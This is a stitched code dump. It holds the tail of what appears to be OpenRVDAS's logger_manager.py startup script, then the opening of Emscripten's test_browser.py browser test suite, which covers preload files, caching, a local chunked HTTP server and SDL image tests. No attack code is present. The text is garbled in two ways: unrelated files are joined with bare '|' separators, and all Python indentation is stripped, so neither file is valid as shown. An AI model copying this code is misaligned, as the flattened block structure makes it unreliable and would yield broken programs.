args = parser.parse_args()
# Set up logging first of all
LOG_LEVELS = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG}
log_level = LOG_LEVELS[min(args.verbosity, max(LOG_LEVELS))]
logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=log_level)
# What level do we want our component loggers to write?
logger_log_level = LOG_LEVELS[min(args.logger_verbosity, max(LOG_LEVELS))]
############################
# First off, start any servers we're supposed to be running
logging.info('Preparing to start LoggerManager.')
# If we're supposed to be running our own CachedDataServer, start it
# here in its own daemon process (daemon so that it dies when we exit).
if args.start_data_server:
data_server_proc = multiprocessing.Process(
name='openrvdas_data_server',
target=run_data_server,
args=(args.data_server_websocket,
args.data_server_back_seconds, args.data_server_cleanup_interval,
args.data_server_interval),
daemon=True)
data_server_proc.start()
############################
# If we do have a data server, add a handler that will echo all
# logger_manager stderr output to it
if args.data_server_websocket:
stderr_writer = ComposedWriter(
transforms=ToDASRecordTransform(field_name='stderr:logger_manager'),
writers=[CachedDataWriter(data_server=args.data_server_websocket)])
logging.getLogger().addHandler(StdErrLoggingHandler(stderr_writer,
parse_to_json=True))
############################
# Instantiate API - a Are we using an in-memory store or Django
# database as our backing store? Do our imports conditionally, so
# they don't actually have to have Django if they're not using it.
if args.database == 'django':
from django_gui.django_server_api import DjangoServerAPI
api = DjangoServerAPI()
elif args.database == 'memory':
from server.in_memory_server_api import InMemoryServerAPI
api = InMemoryServerAPI()
else:
raise ValueError('Illegal arg for --database: "%s"' % args.database)
# Now that API is defined, tack on one more logging handler: one
# that passes messages to API.
# TODO: decide if we even need this. Disabled for now
# logging.getLogger().addHandler(WriteToAPILoggingHandler(api))
############################
# Create our logger supervisor.
supervisor = LoggerSupervisor(
configs=None,
stderr_file_pattern=args.stderr_file_pattern,
stderr_data_server=args.data_server_websocket,
max_tries=args.max_tries,
interval=args.interval,
logger_log_level=logger_log_level)
############################
# Create our LoggerManager
logger_manager = LoggerManager(
api=api, supervisor=supervisor,
data_server_websocket=args.data_server_websocket,
stderr_file_pattern=args.stderr_file_pattern,
interval=args.interval,
log_level=log_level,
logger_log_level=logger_log_level)
# When told to quit, shut down gracefully
api.on_quit(callback=logger_manager.quit)
api.on_quit(callback=supervisor.quit)
# When an active config changes in the database, update our configs here
api.on_update(callback=logger_manager._update_configs)
# When new configs are loaded, update our file of config processes
api.on_load(callback=logger_manager._load_new_definition_from_api)
############################
# Start all the various LoggerManager threads running
logger_manager.start()
############################
# If they've given us an initial configuration, get and load it.
if args.config:
config = read_config(args.config)
# Hacky bit: need to stash the config filename for posterity
if 'cruise' in config:
config['cruise']['config_filename'] = args.config
api.load_configuration(config)
active_mode = args.mode or api.get_default_mode()
api.set_active_mode(active_mode)
api.message_log(source=SOURCE_NAME, user='(%s@%s)' % (USER, HOSTNAME),
log_level=api.INFO,
message='started with: %s, mode %s' %
(args.config, active_mode))
try:
# If no console, just wait for the configuration update thread to
# end as a signal that we're done.
if args.no_console:
logging.warning('--no-console specified; waiting for LoggerManager '
'to exit.')
if logger_manager.update_configs_thread:
logger_manager.update_configs_thread.join()
else:
logging.warning('LoggerManager has no update_configs_thread? '
'Exiting...')
else:
# Create reader to read/process commands from stdin. Note: this
# needs to be in main thread for Ctl-C termination to be properly
# caught and processed, otherwise interrupts go to the wrong places.
# Set up command line interface to get commands. Start by
# reading history file, if one exists, to get past commands.
hist_filename = '.openrvdas_logger_manager_history'
hist_path = os.path.join(os.path.expanduser('~'), hist_filename)
try:
readline.read_history_file(hist_path)
# default history len is -1 (infinite), which may grow unruly
readline.set_history_length(1000)
except (FileNotFoundError, PermissionError):
pass
atexit.register(readline.write_history_file, hist_path)
command_line_reader = ServerAPICommandLine(api=api)
command_line_reader.run()
except KeyboardInterrupt:
pass
logging.debug('Done with logger_manager.py - exiting')
# Ask our SupervisorConnector to shutdown.
if supervisor:
supervisor.quit()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-gsource-map'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
